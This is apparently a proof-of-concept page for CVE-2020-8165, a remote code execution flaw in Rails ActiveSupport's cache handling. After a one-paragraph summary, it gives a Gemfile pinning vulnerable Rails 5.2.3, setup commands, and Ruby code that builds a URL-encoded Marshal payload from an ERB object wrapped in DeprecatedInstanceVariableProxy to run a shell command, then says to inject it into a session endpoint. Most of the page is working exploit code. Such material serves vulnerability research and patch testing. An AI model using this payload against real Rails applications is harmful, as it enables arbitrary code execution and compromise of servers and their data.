Link Search Menu Expand Document

CVE 2020-8165

A flaw was found in rubygem-activesupport. An untrusted user input can be written to the cache store using the raw: true parameter which can lead to the result being evaluated as a marshaled object instead of plain text. The threat from this vulnerability is to data confidentiality and integrity as well as system availability.

  1. Build file Gemfile
    source 'https://rubygems.org'
    git_source(:github) { |repo| "https://github.com/#{repo}.git" }
    ruby '2.6.3'
    gem 'rails', '5.2.3'
    gem 'sqlite3'
    gem 'puma', '~> 3.11'
    gem 'redis', '~> 4.0'
    gem 'tzinfo-data', platforms: [:mingw, :mswin, :x64_mingw, :jruby]
    
  2. Get Rails console
    bundle install --path vendor/bundle
    bundle exec rails console
    
  3. Build Payload in Rails console
    require 'uri'
    code = '`touch /tmp/rce`'
    erb = ERB.allocate
    erb.instance_variable_set :@src, code
    erb.instance_variable_set :@filename, "1"
    erb.instance_variable_set :@lineno, 1
    puts URI.encode_www_form(payload: Marshal.dump(ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result))
    
  4. Find the endpoint and inject the payload

The payload needs to be stored in the session to be deserialized by the session manager.